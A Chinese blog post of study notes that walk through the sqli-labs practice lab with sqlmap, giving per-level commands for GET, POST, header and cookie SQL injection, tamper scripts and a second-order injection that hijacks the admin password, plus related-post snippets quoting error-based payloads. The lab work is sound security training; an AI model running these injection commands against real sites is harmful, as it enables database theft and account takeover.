salmap通关sql-labs学习笔记

最新推荐文章于 2024-05-29 08:30:00 发布
最新推荐文章于 2024-05-29 08:30:00 发布
阅读量584 收藏 3
点赞数 1
分类专栏: 网络安全 sqlmap sql注入 文章标签: sql 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43641876/article/details/127937331
版权

下面是sqlmap的一些常用参数。

sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-1/?id=2" 整体语句
--batch 不需要手动输入YES or NO
--current-db  查看当前使用数据库 
-dbs 观察所有数据库
--current-user 查看当前使用数据库用户
--tables 查看表
--columns查看列 
--level 5 sqlmap一共有5个测试等级1~5,不加等级参数默认是1。
--is-dba 返回true为管理员权限
--roles 查看数据库角色,--u 可以指定用户
-–referer 请求伪造referer头,当设置level为3、或以上则会对referer进行注入。
--user-angent 对user-angent字段进行注入
--cookie 指定cookie字段注入
-p 指定注入位置,如-p id 对id字段进行注入,选定多个注入点使用","分割。
--dump 得到结果展示
--thread 1-10 指定进程数
--tamper 引入插件 这里可以百度下载具体脚本,在这里引入即可,如解码、双写、大小写等

现在开始实验

Less-1

http://192.168.26.1/sqli-labs-master/Less-1/?id=2
在这里插入图片描述

Less-2

http://192.168.26.1/sqli-labs-master/Less-2/?id=2

sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-2/?id=2" --batch
后续和Less-1类似

运行存在延迟注入点。
在这里插入图片描述

Less-3

http://192.168.26.1/sqli-labs-master/Less-3/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-3/?id=2" --batch --dbs
在这里插入图片描述

Less-4

http://192.168.26.1/sqli-labs-master/Less-4/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-4/?id=2" --batch --dbs
在这里插入图片描述

Less-5 (无回显)

http://192.168.26.1/sqli-labs-master/Less-5/?id=3
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-5/?id=2" --batch --dbs
在这里插入图片描述

Less-6(无回显)

http://192.168.26.1/sqli-labs-master/Less-6/?id=1
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-6/?id=2" --batch --dbs
在这里插入图片描述

Less-7(无回显)

http://192.168.26.1/sqli-labs-master/Less-7/?id=3
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-7/?id=2" --batch --dbs
在这里插入图片描述

Less-8(时间盲注)

http://192.168.26.1/sqli-labs-master/Less-8/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-8/?id=2" --batch --dbs
在这里插入图片描述

Less-9

http://192.168.26.1/sqli-labs-master/Less-9/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-9/?id=2" --batch --dbs
在这里插入图片描述

Less-10

http://192.168.26.1/sqli-labs-master/Less-10/?id=2
使用sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-10/?id=2" --batch --dbs 发现GET ID字段不存在注入点。
在这里插入图片描述

提示使用高等级注入
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-10/?id=2" --batch --level 2
在这里插入图片描述

Less-11

http://192.168.26.1/sqli-labs-master/Less-11/?id=2
less11变成了post数据,使用–data命令指定payload进行注入,–data “uname=1&passwd=11&submit=Submit” ,其实这里指定payload相当于说明对此post区域进行注入。
在这里插入图片描述

sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-11/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
成功执行输出。
在这里插入图片描述

Less-12

http://192.168.26.1/sqli-labs-master/Less-12/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-12/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
在这里插入图片描述

Less-13

http://192.168.26.1/sqli-labs-master/Less-13/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-13/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
在这里插入图片描述

Less-14

http://192.168.26.1/sqli-labs-master/Less-14/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-14/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
在这里插入图片描述

Less-15

http://192.168.26.1/sqli-labs-master/Less-15/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-15/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs
延迟注入时间太久,爆出来两个表看到效果即可。
在这里插入图片描述

Less-16

http://192.168.26.1/sqli-labs-master/Less-16/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-16/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs --level 2
在这里插入图片描述

Less-17

http://192.168.26.1/sqli-labs-master/Less-17/?id=2
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-17/?id=2" --batch --data “uname=admin&passwd=admin&submit=Submit” --dbs --level 2
在这里插入图片描述

Less-18

http://192.168.26.1/sqli-labs-master/Less-18/?id=2
用注入命令发现都不行,这里引入agent注入。
在这里插入图片描述

–user-agent=“" --thread=10 通过指定–user-agent参数对user-agent参数进行检查注入点。 --thread设置线程数 1-10 。
sqlmap -u “http://192.168.26.1/sqli-labs-master/Less-18/?id=1" --batch --dbs --user-agent=”” --data “uname=admin&passwd=admin&submit=Submit” --thread 10
在这里插入图片描述

Less-19

http://192.168.26.1/sqli-labs-master/Less-19/
观察源码,有referer可以进行注入。
–referer=“*”
在这里插入图片描述

sqlmap -u “http://192.168.26.1/sqli-labs-master/Less-19/?id=1" --batch --dbs --referer=”*" --data “uname=admin&passwd=admin&submit=Submit” --thread 10
在这里插入图片描述

Less-20

http://192.168.26.1/sqli-labs-master/Less-20/index.php
在这里插入图片描述

–cookie “uname=XXX” 引入cookie注入
sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-20/?id=1" --batch --dbs --cookie=“uname=admin and expires: Fri 18 Nov 2022 - 18:43:19” --thread 10 -level 2
在这里插入图片描述

Less-21

http://192.168.26.1/sqli-labs-master/Less-21/index.php
对输入字符进行base64编码,sqlmap对cookie字段进行base64注入
–tamper “base64encode.py” --tamper是引入插件,其中sqlmap中存在很多插件,如编码解码、绕过空格等
在这里插入图片描述

sqlmap -u "http://192.168.26.1/sqli-labs-master/Less-21/?id=1" --batch --dbs --cookie=“uname=admin and expires: Fri 18 Nov 2022 - 18:43:19” --tamper “base64encode.py” --thread 10 -level 2
在这里插入图片描述

Less-22

http://192.168.26.1/sqli-labs-master/Less-22/index.php
和Less-21雷同

Less-23

http://192.168.26.1/sqli-labs-master/Less-23/index.php?id=1
sqlmap -u http://192.168.26.1/sqli-labs-master/Less-23/index.php?id=1 --batch --dbs
在这里插入图片描述

Less-24(二次注入)

注册–》登录–》更改密码
步骤如下:
注册admin’# 账号
登录admin‘#账号
登录后提示修改密码,这里修改admin账号密码。
修改成功,使用admin账号登录

Less-25

http://192.168.26.1/sqli-labs-master/Less-25/?id=1
sqlmap -u http://192.168.26.1/sqli-labs-master/Less-23/index.php?id=1 --batch --dbs
在这里插入图片描述

报告大大怪
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqli-labs之sqlmap初体验
rev1ve的博客
08-07 571
为了更深入学习sqlmap,打算对sqli-labs进行SQL注入测试学习内容包括不同的请求方式和请求参数,总之写下这篇博客记录我的学习过程。
【SQL注入】sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2128
第一周:SQL注入学习
Sqli-labs-master靶场1-20通关教程
最新发布
weixin_68416970的博客
05-29 1022
Sqli-labs-master靶场1-20通关教程
sql_labs通关,手动加sqlmap
qq_47289634的博客
02-23 741
信息收集: 数据库版本:version()数据库名字:database() 数据库用户:user() 系统:@@version_compile_os MySQL5.0以上版本自带一个information_schema数据库,储存所有的数据库名表名列名 数据库中 . (点)代表下一级 student.users 代表student数据库中的users表看我另外一篇,点击下方蓝色字体sqlmap详细使用方法id=1,id=2返回类内容不同,输入的内容是带入到数据库里面查询了。 判断类型:这里我把源代码输出了
Sqli靶场 11--->22Less
huohaowen的博客
01-29 1604
又是打靶场的一天(靶场球球你别打我)
Sqlmap使用(sqli-lab)
Mccc_li的博客
05-06 3574
1.get使用方法: 1.查看是否有注入点:sqlmap -u 网址 2.爆出数据库名:sqlmap -u 网址 --dbs 5.爆出数据库的表名:sqlmap -u 网址 -D security --tables 6.爆出数据库的列名:sqlmap -u 网址 -D security -T users --columns 7.dump出数据:sqlmap -u -D security -...
sql-labs通关技巧
03-01
在SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
SQL-labs/less1通关教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
salmap测试工具
07-13
sqlmap工具,是针对链接地址中存在的漏洞,进行分布式爆破测试,检测出存在的漏洞!进行针对性的修改
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
在CentOS7中搭建sqli-labs环境以及使用sqlmap对其进行sql注入
m0_53499553的博客
04-04 6843
目录 安装docker 使用docker拉取sqli-labs的镜像 对我们使用到的sqlmap的参数解释 使用Kali中自带的sqlmap进行sql注入 安装docker 因为我们是使用docker去搭建sqli-labs,所以在CentOS7中搭建sqli-labs环境之前需要先安装docker(如果安装过,可以直接去执行安装完docker的后续步骤) 安装需要的软件包,yum-util 提供yum-config-manager实用程序,另外两个是devicemapper驱动依赖的,需要.
Sql-labs 前 20 关 通过笔记
weixin_45619494的博客
10-06 441
输入:passwd=admin' and updatexml(1,concat(0x5e,(substr((select database()),1)),0x5e),1) --+直接用 十八关 payload:3',extractvalue(1,concat(0x7e,(select database()),0x7e))) #发现 用 passwd=admin' sleep(6) --+ ,没有延迟,时间盲注可能没用。修改 0x5e 之前 的数字 为 32,63,94,125,即可获得后续内容!
SQL注入绕过实战案例一
weixin_51525416的博客
09-05 1488
SQL注入绕过实战案例一
使用sqlmap检测sql注入漏洞
热门推荐
菜鸟、上路
08-21 10万+
一、 sql注入概述并安装sqlmap漏洞查看工具 1、 sql注入概述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表...
Sqlmap使用详解
谢公子的博客
12-01 2万+
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定数据库中的所有的表 爆出指定数据库指定表中的所有的列 爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
sqlmap过SQLi-LABS靶场 11-20关
小明师傅博客
06-05 3634
第11关 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12关 一模一样 第13关 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14关 一模一样 15关 一模一样 16关-20关 都
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库,用于存储 SQL-Labs 的数据。您可以使用以下命令在 MySQL 命令行中创建一个新数据库: ``` CREATE DATABASE sqli; ``` 4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `your_username` 为您的 MySQL 用户名,并输入密码进行验证。 5. 配置 SQL-Labs。进入 SQL-Labs 文件夹中的 `db.php` 文件,按照注释中的提示修改数据库连接信息,包括主机名、用户名、密码和数据库名称。 ``` $host = 'localhost'; $user = 'your_username'; $password = 'your_password'; $db = 'sqli'; ``` 6. 启动 Web 服务器,并在浏览器中访问 SQL-Labs。在浏览器中输入 `http://localhost/sql-labs/`,您应该能够看到 SQL-Labs 的登录页面。 现在,您已经成功安装并配置了 SQL-Labs。请确保仔细阅读项目的文档,了解如何正确使用和利用 SQL-Labs 的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值